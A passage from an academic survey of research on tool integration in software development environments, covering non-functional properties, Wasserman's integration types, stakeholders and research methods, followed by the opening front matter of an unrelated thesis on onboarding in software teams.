<td>Large and varied amount of classification schemes.</td>
<td>5</td>
</tr>
<tr>
<td>4, 5 and 7</td>
<td>High focus on frameworks, reference models and associated products (concepts that to some extent “blur”), implying a well known system context.</td>
<td>6</td>
</tr>
<tr>
<td>8 and 9</td>
<td>Small effort on evaluation and empirical data, raising concerns with regard to the theory underlying the discussion.</td>
<td>7</td>
</tr>
</tbody>
</table>

4. Tool Integration and Non-functional Properties

The types of non-functional properties and the way in which they have been discussed are detailed further in this section. To support the internal validity of these findings, the most frequently mentioned non-functional properties are then compared to those frequently occurring in the iFEST questionnaire.

4.1. Findings

As seen in Table 1, a majority of the sources touch upon the non-functional properties of tool integration. These properties are by nature not easily defined, with most sources not offering any clear definitions, priority order or discussion of how these properties relate. An examination of the definitions of the properties given by the sources also shows that different names are often used to refer to the same property, and vice versa - that the same name can actually refer to different properties. Nevertheless, even after merging the cases when the sources simply seem to be using different terminologies, one is still left with an impressive 30 different non-functional properties.
Of these properties, the 10 most often mentioned make up 73% of the occurrences counted, with the top six properties together accounting for 58% of the occurrences, in roughly similar shares (see Figure 1). Furthermore, when the top six properties are laid out in a graph showing their occurrences across the last two decades, each shows an even distribution over time (see Figure 2). In other words, throughout the discourse a few non-functional properties have stood out as more important to discuss than others. The top six of these non-functional properties are discussed in more detail below.

- **Flexibility** is the ease with which a support environment can be adapted. A requirement for flexibility can stem from the need to handle early misunderstandings of the requirements on a support environment (Osterweil, 1988), seamlessly introduce novel features (Tilley and Smith, 1996) and support cost savings (Welsh and Yang, 1994). Flexibility is therefore discussed both in regard to the parts that make up a support environment and a support environment seen as a whole. The former discussion has for instance touched upon the interchangeability of tools (Jucovschi, 2012), while the latter has dealt with how to adapt to the specific conditions of different companies (Endig and Jesko, 2001) or even different application domains (Becker et al., 2002).
- **Scalability** is the degree to which a support environment can be treated, and be expected to behave, similarly, regardless of changes to the number of parts that it consists of. Lack of scalability support can show itself through inconsistencies (Finkelstein et al., 1994) or by end users being overwhelmed by too much information (Tilley, 1995). Scalability can be discussed in relation to parts of support environments, such as standard exchange formats (Holt et al., 2006). However, some regard this property as primarily related to the whole (Miadidis, 2007).
Solutions for achieving scalability have been put forward in both of these discussions. Scalability has for instance been claimed to be a benefit of component-based architectures (Michaud, 2003). However, no strong case has been made for a relationship between these solutions and certain high level issues linked to scalability, such as the flaws in cognitive support and knowledge transfer mentioned by Brown and Penedo (1994).
- **Cost** is the impact that support environments have on financial matters. When discussed in a narrow sense, this relates to the direct costs of designing, constructing and deploying support environments (Brown, 1993b), but also how to measure their impact (Baik et al., 2002). When discussed in a broader sense, cost relates to the implications of the business context of related stakeholders. For instance, different business models of tool vendors have been discussed both as a limitation to which tools are integrated (Brown et al., 1992) and as a prerequisite for allowing any major benefits to be gained by deploying support environments (Tilley et al., 2004). In this discussion, the use of support environments has been mentioned as commonly based on business goals (Wicks and Dewar, 2007) or even as a critical part of achieving business success (Marquardt and Nagl, 2004).
- **Evolvability** is the potential of a support environment to facilitate change over time. This is discussed from two perspectives. Firstly, in regard to changes inside the support environment itself. For instance, how the availability of evolvable support environments can be important in ensuring the success of new technology (Dewar, 2005) or how evolution needs to be possible to drive and direct (Osterweil, 1988). Secondly, in regard to how a support environment can be used to facilitate product evolution when used during development (Belkhatir et al., 1994; Belkhatir, 1997).
Additionally, evolvability is also discussed in relation to whole support environments and the parts they are made up of: the former in regard to how economical and political influences can impact the possibility of support environments to evolve (Earl, 1990); and the latter in regard to which technology is best suited for facilitating change (Michaud, 2003).
- **Efficiency** is discussed in conjunction with tool integration with regard to both the technological performance of support environments (Shi, 2007) and how organizations utilizing support environments can perform better (Armengaud et al., 2012). The latter, broader focus is naturally linked to the discussion on automation of tedious, repetitive tasks (Westfechtel, 1999).
- **The degree of standardization** is the degree to which a support environment conforms to readily available specifications (even though the distribution of the specifications might be limited to, for instance, those that have paid a fee). The impact of standards may be on details as well as on broader concerns, since different standards target different levels of abstraction. The motivations given for an increased degree of standardization are therefore diverse, such as enabling adaption to different domains (Sum and Iholf, 1994), being a prerequisite to dealing with tool integration product lifecycle issues (Schneider and Marquardt, 2002), avoiding tool vendor lock-in (Ertürken, 2010), and so on.

Even if the provided definitions help to differentiate between the mentioned non-functional properties, it does not automatically mean that it is valuable to do so. In the case of support environments these non-functional properties can be too interconnected to allow for them to be studied in isolation. In Subsection 8.1 we provide a number of high level research questions connected to these non-functional properties for future research.
An added benefit of pursuing several of these questions in parallel would be the possibility of understanding whether there are common obstacles, such as interconnectivity, to answering this type of question.

### 4.2. Internal Validity of the Findings

Of the non-functional properties mentioned in relation to tool integration in the iFEST questionnaire, the top 5 are the degree of standardization (31%), efficiency (22%), flexibility (12%), support for evolution (9%) and cost (8%). These are also the only ones with a considerable share of the total. Scalability is not mentioned at all. It is reasonable to assume that method bias has not led to incomplete results, but that scalability is perhaps emphasized more in academic discourse than in industrial settings.

### 5. Integration Types

Based on the importance given to classification schemes by the sources, this section starts by describing the way the sources have used and elaborated on Wasserman’s classification scheme (Wasserman, 1990), and then contrasts it with other approaches that describe tool integration at a high level of abstraction. To support the internal validity of these findings, the classification scheme introduced by Wasserman (1990) is also related to the iFEST questionnaire.

5.1. Findings

Wasserman (1990) introduced 5 types of tool integration, namely Control, Data, Platform, Presentation and Process Integration. These are described as “dimensions”, i.e. separate, unconnected concerns. The separation between the types of tool integration rests on relating them to different kinds of supporting tools and mechanisms. These types of tool integration are by far the most popular idea brought forward by Wasserman (1990). While 44% actively use Wasserman’s types of tool integration to structure their discussion, a further 22% mention them. Out of the 28% that make use of other classification schemes, 40% do so in combination with Wasserman’s types of tool integration.
However, a deeper investigation of the 66% that make use of Wasserman’s classification scheme, summarized in Figure 3, shows that the use is not coherent. Many of these sources elaborate on the meaning of the different types or choose freely which of them to take into account. In the five subsequent subsections we start by describing each of these types as they were presented by Wasserman (1990) and then go through how other sources have viewed them differently. Thereafter we discuss other approaches to defining types of tool integration and close by discussing the internal validity of the results. 5.2. Control Integration Wasserman (1990) described control integration as the ability of tools to notify each other of events and activate each other under program control. This definition prevails throughout the discourse, although a significant number of the surveyed sources try to add on different process aspects such as process management (Zelkowski, 1993), coordination and synchronization to enable cooperation (Nuseibeh, 1994) and the ability of tools to notify users (Biehl, 2011). Several sources also try to clarify control integration by tying its definition to tool functionality, for instance by referring to the use and provision of functionality (Thomas and Nejmeh, 1992), or the intent to combine functionality (Brown and Penedo, 1994). 5.3. Data Integration Wasserman (1990) described data integration as the ability of tools to share data with each other and manage the relationships among data objects produced by each other. This definition mostly prevails throughout the discourse. A few sources limit the definition, for instance by only referring to data sharing (Brown et al., 1994). Most sources try to clarify the definition through examples, e.g. data persistence (Stavridou, 1999), syntax (Biehl et al., 2010b), semantics (Schneider and Marquardt, 2002), consistency (Thomas and Nejmeh, 1992) and traceability (Koudri et al., 2011). 5.4. 
Platform Integration Wasserman (1990) described platform integration as the set of system services that provide network and operating systems transparency to tools and tool frameworks. This definition almost entirely prevails throughout the discourse, mostly in vague references to “common platforms”. The only elaboration makes the definition wider by including all common parts of an environment, rather than just services (Asplund et al., 2011). 5.5. Presentation Integration Wasserman (1990) described presentation integration as the set of services and guidelines that allow tools to achieve a common "look and feel" from the user’s perspective. This definition prevails throughout the discourse, but with several interesting points raised by those that do not adhere to it. Some sources add to the definition by including user interface sophistication (Brown et al., 1994; Stavridou, 1999) or interaction paradigms (Thomas and Nejmeh, 1992). Others entirely reject the view that the goal of presentation integration is always to produce a uniform user interface (Wong, 1999; Tilley, 2000; Asplund et al., 2011). These instead argue that the focus should be changed to the integration of the different users to the tools via their user interfaces. This means that a tool should be able to present different user interfaces to users with different professional roles, backgrounds, knowledge, purposes or visualization preferences. The goal of presentation integration would then be to facilitate the correct matching of user interfaces to the different users. The idea that presentation integration is by necessity a separate concern is even challenged by Stoeckle et al. (2005), since visualization notations may, through control or data integration, achieve the same result as a common “look and feel”. 5.6. Process Integration Wasserman (1990) described process integration as the integration of process management tools with other tools in the support environment. 
In a later paper Wasserman himself redefined this type of tool integration using the much wider “linkage between tool usage and the software development process” (Wasserman, 1996). In fact, many of the sources in the discourse have challenged Wasserman’s original definition, and in some cases the later definition is used even though the sources refer to the original paper (Thomas and Nejmeh, 1992; Baruzzo and Comini, 2007). The most common way of defining process integration is to simply state that it concerns ensuring a proper match between processes and tool integration technology (Long and Morris, 1993). Other common definitions tie process integration to the definition and integration of process models (Nuseibeh, 1994), the awareness and enforcing of process constraints on tools based on user roles and process states (Kordon and Mounier, 1997), or both (Gautier et al., 1995a). Additionally, while the perspective of most sources is that processes should determine which tools are used and how they behave, a few sources acknowledge the fact that legacy tools and tool integration technology might enforce a particular structure on workflows (Marquardt and Nagl, 2004; Biehl et al., 2010a).

5.7. Other Approaches

A classification scheme is a collection of conceptual categories that highlight important, distinct parts of a subject under discussion. As such it should be detailed enough to allow reasoning about (a part of) a subject, but also abstract enough not to unnecessarily confuse the discussion. Classification schemes are therefore closely related to reference models, the difference being that reference models, even though they do not have to be immediately realizable, should at least be detailed enough to allow independent work in relation to the subject (for instance on standards (Earl, 1990)).
Not surprisingly one other approach to defining types of tool integration is therefore to link Wasserman’s types of tool integration to different parts of a reference model, for example as done by Brown et al. (1994) in relation to a reference model which divides support environments into three levels, namely the mechanism (how are the components in the support environment connected), service (what does the support environment provide) and process levels (which activities does the support environment support). Control, data, platform and presentation integration are allocated to the mechanism level, while process integration is allocated to the process level. The same source also raises doubts as to whether the different types of integration are in fact “dimensions”, proposing that as mechanisms become increasingly sophisticated, the boundaries between the different types may blur. Later Losavio further detailed this reference model by differentiating between integration targeting the internal organization, external entities and management (Losavio et al., 2002). The most common other type of approach, however, is a classification scheme that differs from Wasserman’s only in the use of more categories within a type of tool integration or by drawing the boundaries between them differently. An example of the former is Brown and McDermid (1992) equating tool integration to data integration, which is then further divided into the carrier, lexical, syntactic, semantic and method levels. An example of the latter is proposed by Brielmann et al. (1993) in the form of the three separate dimensions of control, data and user interface integration. These three dimensions are a combination of Wasserman’s control and process integration, a combination of Wasserman’s data and (part of) platform integration, and the same as Wasserman’s presentation integration, respectively. 
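Read concretely, a scheme such as that of Brielmann et al. (1993) can be expressed as a mapping onto Wasserman’s five types, which makes overlaps and gaps between classification schemes easy to check mechanically. The sketch below is our own illustration of that correspondence, not code or a mapping taken from any of the surveyed sources:

```python
# Wasserman's (1990) five types of tool integration.
WASSERMAN_TYPES = {"control", "data", "platform", "presentation", "process"}

# One reading of the three dimensions of Brielmann et al. (1993), expressed as
# combinations of Wasserman's types (an illustrative interpretation only):
# their data dimension absorbs only part of platform integration.
BRIELMANN_DIMENSIONS = {
    "control": {"control", "process"},
    "data": {"data", "platform"},
    "user interface": {"presentation"},
}

def covered_types(dimensions):
    """Return the union of Wasserman types covered by a classification scheme."""
    return set().union(*dimensions.values())

# Under this reading, the three dimensions jointly cover all five types.
assert covered_types(BRIELMANN_DIMENSIONS) == WASSERMAN_TYPES
```

Writing the schemes down in this form also exposes the kind of boundary-drawing differences discussed above, e.g. a scheme that equates tool integration with data integration would simply cover the singleton set {"data"}.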
Data integration is the most commonly discussed type of integration in these approaches, followed by presentation, control and process (in that order). Other approaches add to Wasserman’s classification scheme. Zelkowitz, for example, mentions three notions of tool integration that affect the design of support environments (Zelkowitz, 1996): the conceptual (a shared philosophy in regard to the interaction of support environment components), the architectural (how support environment components are constructed to interact) and the physical (the interaction of the actual instances of support environment components). A few other approaches make use of wholly different types. The most obvious example in the sources is Wende et al. (2010), who use a classification scheme that measures support environments along two dimensions: extensibility, which in this source is a measure of customizability, and guidance, which is a measure of how well the process of customizing the support environment is supported. This scheme was later extended by adding reuse, a measure of the reuse of shared platform functions between different support environments (Wende et al., 2011).

5.8. Internal Validity of the Findings

All references in the iFEST questionnaire that can be related to abstract categories of tool integration fall within the original types of tool integration suggested by Wasserman. Interestingly enough, most of these references relate to data (54%) and platform (18%) integration. Again, it is reasonable to assume that method bias has not led to incomplete results. The high focus on data and platform integration in the questionnaire, coupled with the survey sources mostly using these categories “as is” or ignoring them, is an indication that they are the least controversial categories in the discourse.

6.
The System Context

Based on the high focus on implementation and on providing reference models, this section takes a closer look at the system context used by the sources when discussing tool integration. This results in an in-depth discussion of stakeholders relevant to tool integration, since most sources show no conclusive evidence of a well understood system context. To support the internal validity of these findings, the stakeholders mentioned by the sources are also related to the iFEST questionnaire.

6.1. Findings

Figure 4 shows the distribution of the overall contexts that the sources use to frame their discussion. A few sources generalize, meaning that they imply that tool integration can be treated in a similar way across all contexts. More sources discuss tool integration as framed by systems development, a context that can be further divided into two groups. The first includes those sources that have a narrow focus on only the development phase or provide no detailed definition of systems development. The second includes those sources that at least mention a broader view of other life-cycle phases of systems development, such as maintenance, production and decommissioning. Similar groups of sources can be found that further restrict themselves to software development. Finally, one group consists of sources that use a specific application domain as a context for discussing tool integration, the most often used domains being software re-engineering (22%), enterprise applications (19%) and chemical engineering (15%). It is clear that development is the most common context envisioned when discussing the essence of tool integration, either in a narrow (39%) or a broad (32%) sense. This is not a very strong finding, considering that the basis for the survey is a paper in the software engineering field (Wasserman, 1990).
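The shares behind a distribution like the one in Figure 4 can be computed from a simple tally. The counts below are invented for illustration, chosen only so that the computed shares match the figures reported in the text (39% narrow development, 32% broad development); the remaining categories and their sizes are assumptions:

```python
from collections import Counter

# Hypothetical tally of sources per overall context. Only the two
# development shares (39% and 32%) come from the text; the other
# counts are invented so that the totals sum to 100.
contexts = Counter({
    "development (narrow)": 39,
    "development (broad)": 32,
    "specific application domain": 21,
    "generalizing": 8,
})

total = sum(contexts.values())
shares = {context: round(100 * count / total) for context, count in contexts.items()}
print(shares["development (narrow)"])  # 39
print(shares["development (broad)"])   # 32
```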
However, the initially general or non-existent description of the system context in most sources suggests that it is an unimportant, obvious or overlooked factor. That the system context is unimportant is belied by the other findings in this report, such as the higher level at which some non-functional properties are discussed (see Section 4) and the many sources which elaborate on process integration (see Section 5). To ascertain whether the details of this factor are obvious to, or overlooked by, those involved in the discourse, we further studied the relevant sources.

A closer look revealed that only 13% (of all sources) provide a more in-depth discussion of the context of tool integration. Of these, the majority either discuss different scales of organization (20%) or different stakeholders (60%). The former relates to discussing tool integration as important to the individual, the team, the organization and interorganizational relationships. The latter is summarized in Figure 5, which lists the top five stakeholders being discussed. These are the tool developers, management (in any related organization), support environment customizers (those putting together a particular instance or providing support for it), support environment designers (those developing the basic support environment software) and end users (in the role of users and customers). This one-sided focus on a narrow set of stakeholders, important to the implementation of a support environment, points at the system context being overlooked rather than obvious to those involved in the discourse. An in-depth discussion of the continuous evolution of a support environment throughout its lifetime would require one to consider the much larger set of stakeholders involved in relevant decision-making, standardization attempts and maintenance.

6.2.
Internal Validity of the Findings

End users (in the role of users (76%) and customers (16%)) are the only stakeholders mentioned in the iFEST questionnaire to any great degree. It is reasonable to assume that method bias has not led to an incorrect perception of a high focus on end users, but the focus on support environment designers is probably higher in the academic discourse than in industrial settings.

7. Research Methods

Based on there being few sources that provide in-depth reporting on empirical evidence related to tool integration, this section studies the research methods employed by the different sources. The problem of establishing the validity of the findings for any part of the discourse that takes place outside the academic literature is then highlighted in the second subsection.

7.1. Findings

As seen in Table 1, there is a lack of published in-depth empirical data in relation to the discussion on the essence of tool integration. Eight different research methods could be identified when the sources were studied further. A summary of how many sources employed each research method can be found in Figure 6. *Expert knowledge* is a part of all scientific inquiry, but the largest group identified consists of those sources that *only* make use of expert knowledge. This is not necessarily a problem. A reference model or a summary of the State of the Art does not have to include a solid empirical base to be useful, but rather rests on the reasoning of those experts involved in writing it (the paper by Brown (1993b) is a good example of this). However, several of the sources included in this group simply did not provide a description of the methods used, which has to be seen as problematic with regard to judging the validity of their findings. The second largest group consists of those sources that make use of *case studies*, i.e. studies of a limited number of instances of a phenomenon.
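The coding step described here, tagging each surveyed source with the research method it employs and tallying the tags, can be sketched as follows. The source records are invented placeholders, not actual entries from the survey:

```python
from collections import Counter

# Sketch of the coding step: each source is tagged with the research
# method it employs, and the tags are tallied (as summarized in
# Figure 6). These records are invented, not real survey entries.
coded_sources = [
    ("source A", "expert knowledge only"),
    ("source B", "expert knowledge only"),
    ("source C", "case study"),
    ("source D", "case study"),
    ("source E", "interview"),
]

method_counts = Counter(method for _, method in coded_sources)
for method, count in method_counts.most_common():
    print(method, count)
```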
Even though this research method has been criticized over the difficulty of ensuring that its results are generalizable, this is also not necessarily problematic. Only one of these case studies, however, was a critical case study, i.e. one set up specifically so that it could answer a particular research question. All of the others were open-ended, exploratory case studies. All of the other groups are formed by research methods that were each only used by 1-3% of the sources. These include interviews, questionnaires, mathematical proofs, literature surveys, content analyses and experiments. Most of these groupings are self-explanatory, but it should be noted that only sources providing a description of a literature survey method were included in the literature survey group. In other words, even though most academic papers include some part that discusses relevant literature, this grouping only included those sources that had the explicit purpose of surveying a large amount of literature based on well defined selection criteria.

7.2. Internal Validity of the Findings

Research methods are not discussed in the iFEST questionnaire at all. This part of the paper therefore only provides input to the conclusions in regard to the historical, academic discourse on tool integration. The true distribution of methods employed to gain knowledge on the essence of tool integration may in fact be different, for instance if industrial companies perform a lot of experiments that are never reported.

8. Discussion

This section discusses the discourse on the essence of tool integration, its context and the implications in light of the findings presented in the previous sections. New research questions are put forward based on the non-functional properties mentioned throughout the discourse, something which also has implications for the study of stakeholders relevant to tool integration.
The problem of evolving Wasserman’s types of tool integration is discussed, with two frequently mentioned redefinitions highlighted. Potentially problematic effects of the set of research methods currently employed in the discourse are highlighted, and a proposal on how to change this set is outlined. The section then closes by discussing the need to further investigate disparate discourses and highlighting the importance of open communities in relation to this. The observant reader may notice that the order of the subsections below does not directly match that implied by the order of the previous sections. While the order of the previous sections follows the size of the initial categories discussed within them, the order of the subsections below was chosen to ease the flow of the discussion.

8.1. A Discourse Focused on Details

The non-functional properties identified in Section 4 to some extent provide a previously missing prioritization order. This order is not an objective measure, but rather reflects what has been seen as important by many taking part in the discourse on the essence of tool integration. More importantly, while the overall discourse on tool integration largely focuses on mechanisms (Wicks and Dewar, 2007), the studied discussion related to non-functional properties indicates that the focus should be less on details and more on issues at higher levels. Based on the identified properties, for instance, the following (research) questions merit attention in future research:

- Do different application domains put different requirements on tool integration?
- How can tool integration support stakeholders in interacting not only with all data in a support environment scaled to modern situations, but with the right data?
- How can business models help drive the deployment of tool integration, not just lock users to a single vendor?
- What is the impact of a technological shift, such as the recent decline in the use of Java in favour of RESTful web services, on an organization employing a modern support environment?
- When does automating a series of tasks actually provide efficiency gains?
- How is tool integration standardized? In which standards and by which standardization bodies?

These are just representative examples for each of the non-functional properties found in Section 4; more (research) questions akin to these need to be formulated, and related research areas inventoried for relevant knowledge.

8.2. An Increased Set of Stakeholders

Research questions with a wider scope will require knowledge of more stakeholders than those found in the discourse on the essence of tool integration so far. As shown in Section 6, end users currently receive most of the attention in the discourse, even if support environment designers also receive a fair share of the focus in the literature. Based on the questions mentioned in the previous subsection one can, for instance, identify the following stakeholders as being of interest to study further:

- **Application domain experts.** As an example, software engineers commonly receive abstract product requirements and implement the design directly in code. Hardware engineers, by contrast, spend a lot of time in various design tools representing different levels of abstraction. These different domains therefore put different demands on when and why tool integration should be deployed to support development.
- **Project managers.** While project managers are end users, they are presumably not only interested in moving data from one tool to another. The possibility to link to data sources throughout the product life-cycle to enable analysis is clear, but to enable any benefits the set of analyses of interest needs to be known.
- **Managers.** Managers ultimately decide which solutions are put in place, but the metrics needed to support this decision-making have so far been elusive. Currently the parameters that factor into these equations are largely unknown.
- **Support environment administrators.** The deployment of several different systems, or difficulties in configuring systems, impacts administrators to a large degree. This leads to resistance against deploying large-scale support environments and favours ad hoc tool integration. For large-scale support environments to even be considered, the prioritizations of those that will maintain them also need to be taken into account.
- **Customers.** A modern support environment may enable an increased pace of product releases, something which is already a reality in some software engineering domains. While changes to release frequency may be beneficial in many ways, customers may have difficulties in adopting them and become wary if they are not appropriately consulted.
- **Standardization organizations.** Even large research projects frequently have problems with standardizing their findings. Standardization organizations are entities of their own, and ensuring their approval and use of research findings is not straightforward.

The choice of which stakeholders to study in the end also depends on the context that is being studied. However, currently most researchers feel no need to detail the overall context of their research when discussing the essence of tool integration. As described in Section 6, they either contend that tool integration is straightforward to generalize or avoid the question altogether by describing their engineering context in vague terms. However, if these “generic” solutions are easily applicable in all contexts, how come the main part of most industrial support environments is instead made up of ad hoc solutions?
In reality most of the specialized requirements of different application domains remain unknown, meaning that all claims of generic solutions cannot be said to be based on empirical evidence. In the end, the primary motivation for detailing the relevant stakeholders might be to expose the way their motivations differ from case to case, thereby paving the way for configurable tool integration that can enable truly generic support environments.

8.3. A Note about the Types of Tool Integration

The types of tool integration originally identified by Wasserman are also likely to be treated similarly in relation to a wider context and a larger set of stakeholders. At a higher level of abstraction they can be freely combined and elaborated into a flexible checklist for discussing the essence of tool integration. However, although this flexibility has meant that the types have been used extensively, it also means that constant effort is required to maintain a place in the discourse for proposed changes to their definitions. For instance, process integration, as shown in Figure 3, has required constant redefinitions throughout the discourse. This is the case even though Wasserman himself later chose to use a wider definition of this type (Wasserman, 1996). Two proposed redefinitions are frequently mentioned but have failed to be used by those not explicitly interested in these specific parts of the discussion:

• the notion that the “dimensions” are not independent. With such wide definitions in use, these types are commonly discussed as if they were *de facto* related. This has implications primarily on presentation and process integration, since these are dependent on the other categories to a higher degree (Asplund et al., 2011). A consequence of this view is that not only the types should be discussed in regard to proposed solutions, but also the different dependencies that exist between them.
• the view that presentation integration should not target uniform environments, but rather enable customized Graphical User Interfaces (GUIs) for users with different needs.

Hopefully this paper can in some way facilitate a wider use of these redefinitions.

8.4. Research Methods

The most commonly used research methods in the discourse on the essence of tool integration are expert knowledge and exploratory case studies. As discussed in Section 7, this is not necessarily a problem. However, when the research field is permeated by these two research methods and by studies that do not disclose their research designs to any high degree, it is natural to ask how confident one can be in the validity of the accepted “truths” of the field. Generalizability in particular is not ensured by the repetition of the same opinion by many experts, or by the success of a particular solution in several cases. If more research methods are required to strengthen the claim of validity, which ones should then be chosen? It could be argued that just using more research methods to encourage the development of different views in a research field is valuable in itself, but if care is not taken there are potential risks, for instance incoherent theory development (Blessing and Chakrabarti, 2009). Some research methods are also potentially very fruitful, but difficult to use within software engineering (Fenton et al., 1994). A more plausible way forward is to design a change to the set of research methods based on the distinguishing characteristics of the research field itself. One such defining characteristic is the strong focus on software design solutions by researchers in the field. This focus is shown by previous studies (Wicks and Dewar, 2007), the focus on implementations (see Section 3) and the choice of stakeholders in the academic discourse (see Section 6).
One conclusion is that research into tool integration is performed just as much with the intent to invent and present new software designs as to provide knowledge on the phenomenon of tool integration. A start towards a changed set of research methods is most likely to be successful if it can be motivated in combination with such an intention. A first step for researchers into tool integration should be to consider a shift from exploratory case studies to critical case studies. In other words, more cases should be chosen with care for how easily generalizable their findings are. Flyvbjerg (2011) gives the example of how measuring the impact of handling organic solvents on workers at an enterprise that rigorously follows safety regulations might be generalizable to workers at enterprises that are not as rigorous. Similarly, it may be easier to claim valid findings if a new technology for evolvable and scalable support environments is deployed at an organization undergoing significant growth, rather than at an organization that remains static for the duration of the study.

A second step follows from the large efforts put into implementation: the design of support environments can both attract researchers from other research fields and achieve synergy effects together with them. If a new mechanism for support environments is constructed, then its impact on software customization, data mining, systems engineering and different application domains could be studied in parallel. This would provide the possibility to set up theory triangulation studies (Denzin, 2006), which could foster the use of several research methods in parallel mixed method studies (Tashakkori and Teddlie, 1998). A reasonable assumption is that interviews and content analysis can play a role in such studies, at least in the many cases where the system context is given by such abstract and complex activities as system and software engineering (see Section 6).
For example, interviews can be used to collect data on the efficiency of different visualization techniques, with the execution times of the underlying technology simultaneously recorded; defect data can be gathered and statistically analysed, with engineers interviewed on the likely origin of quality problems. Besides helping to ensure validity, diversifying the employed research methods in this way would benefit tool integration researchers in other ways as well. With regard to critical case studies, we argue that it would lead to more focused field studies. With regard to theory triangulation, we argue that it would lead to a quicker uptake of State of the Art findings from other research fields. Better focused field studies in particular would make it possible to answer such high-level research questions as those found in Subsection 8.1. Furthermore, both of these benefits are important not just to academia, but also to industry. Testing unproven technology quickly, with the intent to identify the boundaries within which its use is realistic, should lead to knowledge that is more valuable to decision makers.

8.5. Disparate Discourses

When scanning through the final set of sources, we can identify several expected connections, e.g. to the Model-Driven Engineering (MDE) discourse (e.g. through the paper by Kapsammer et al. (2006)). However, there are also some that we did not expect, which connect the targeted discourse to, for example, chemical engineering (e.g. through Marquardt and Nagl (2004)) and software re-engineering (e.g. through Tilley (1995)). As mentioned in the discussion on validity in Subsection 2.2, there may also be relevant findings in unconnected discourses that are difficult to tie to the targeted discourse due to differences in terminologies, research methods and models.
We can identify at least one discourse with a high potential of containing findings relevant to tool integration, namely the discourse on ISO 10303 (informally known as the STandard for the Exchange of Product model data, STEP). The discourse on STEP is primarily focused on data integration (Pratt, 2005), as is the previously mentioned MDE discourse (Giese et al., 2010). This paper shows that the tool integration discourse is not limited to low-level implementation details, and the STEP discourse has similar implications. High-level issues discussed in the STEP discourse include, for example, business drivers, high-level stakeholders and different application domains (Fowler, 1995). It is particularly interesting that this disparate discourse focuses on a standard. We also work with safety standards, such as IEC 61508 (2010), ISO 26262 (2011) and DO-178C (2011a). Changes in industrial practices have required these standards to take tools and tool integration more and more into account. For instance, DO-330 (2011b), which was one of the first released supplements of DO-178C, focuses solely on software tool qualification. Although there is a connection between the targeted discourse and the discourse on these standards (e.g. through (Armengaud et al., 2012)), it is weak. Further research is required to investigate the implications in these and other disparate or weakly connected discourses. Seeing that standardization is an important topic in the targeted discourse, communication of experiences and knowledge across open communities employed in the context of (pre-)standardization could be especially fruitful. Not only would this communication create opportunities for theory triangulation (see the previous subsection), but it would also offer opportunities to observe and interact with a larger set of stakeholders in their particular system contexts.

9.
Conclusions

By surveying sources in the strands of research focusing on the essence of tool integration, six non-functional properties that are treated as especially important have been identified: flexibility, scalability, cost, evolvability, efficiency and the degree of standardization. In the surveyed sources these properties are discussed both with a narrow focus on technology and with a broader focus on how a support environment as a whole impacts its environment. However, this environment, or system context, is vaguely defined, with important stakeholders only discussed in passing, if at all. The discussion in the targeted discourse related to the six non-functional properties points at the lack of research into how support environments impact and are impacted by high-level issues, such as differences between application domains, business models and organizational efficiency. Redeeming this lack will require a substantial effort to identify the motivations of a larger set of stakeholders and how these motivations differ between different system contexts. Wasserman’s types of tool integration are likely to continue to be used as a flexible checklist, regardless of whether this lack is redeemed or not. However, this checklist would benefit from two changes. Firstly, the notion of an independence between the types needs to be rejected, and each of the dependencies that exist between the types incorporated into the checklist. Secondly, presentation integration should be redefined, focusing on how different users interact with GUIs rather than how GUIs can be made to look the same. Furthermore, a summary of the research methods used throughout the targeted discourse shows a large proportion of studies that use exploratory case studies or only expert knowledge. This, together with the high number of studies that do not provide details on their research design, motivates a changed set of research methods to ensure validity.
A shift towards critical case studies and theory triangulation stands a good chance of acceptance and fruitfulness, based on the common intention to invent and present new software designs in the discourse. Finally, there are discourses that are separate from, or weakly connected to, the targeted discourse, but which have a high probability of containing relevant findings. The examples highlighted by us are standardization discourses, implying that open communities employed in the context of (pre-)standardization could be especially important in furthering the discourse on the essence of tool integration.

Acknowledgments

Special thanks go to Vicki Derbyshire for her help in proofreading this paper and to Jad El-khoury for his advice on how to improve certain parts of it.

References

Gu, W., 2012. Tool Integration: Model-Based Tool Adapter Construction and Discovery Conforming to OSLC. Master's thesis, Uppsala University, Department of Information Technology.

Special Committee 205 of RTCA, Inc., 2011a. DO-178C, software considerations in airborne systems and equipment certification.

Special Committee 205 of RTCA, Inc., 2011b. DO-330, software tool qualification considerations.
Product-Related Learning Activities and Their Impact on the Effectiveness of the Onboarding Process in a Software Development Team Bachelor of Science Thesis in Software Engineering and Management AMANDA HOFFSTRÖM The Author grants to University of Gothenburg and Chalmers University of Technology the non-exclusive right to publish the Work electronically and in a non-commercial purpose make it accessible on the Internet. The Author warrants that he/she is the author to the Work, and warrants that the Work does not contain text, pictures or other material that violates copyright law. The Author shall, when transferring the rights of the Work to a third party (for example a publisher or a company), acknowledge the third party about this agreement. If the Author has signed a copyright agreement with a third party regarding the Work, the Author warrants hereby that he/she has obtained any necessary permission from this third party to let University of Gothenburg and Chalmers University of Technology store the Work electronically and make it accessible on the Internet. Product-Related Learning Activities and Their Impact on the Effectiveness of the Onboarding Process in a Software Development Team AMANDA EVELINA HOFFSTRÖM © AMANDA EVELINA HOFFSTRÖM June 2018. Supervisor: JAN-PHILIPP STEGHÖFER Examiner: LUCAS GREN University of Gothenburg Chalmers University of Technology Department of Computer Science and Engineering SE-412 96 Göteborg Sweden Telephone + 46 (0)31-772 1000 Department of Computer Science and Engineering UNIVERSITY OF GOTHENBURG CHALMERS UNIVERSITY OF TECHNOLOGY Gothenburg, Sweden 2018 Product-Related Learning Activities and Their Impact on the Effectiveness of Onboarding in a Software Development Team Amanda Hoffström¹ Abstract—The effectiveness of the onboarding process is of importance to Information Technology (IT) companies since it determines how fast and how well the novice becomes integrated and independent in his or her new role as a developer.
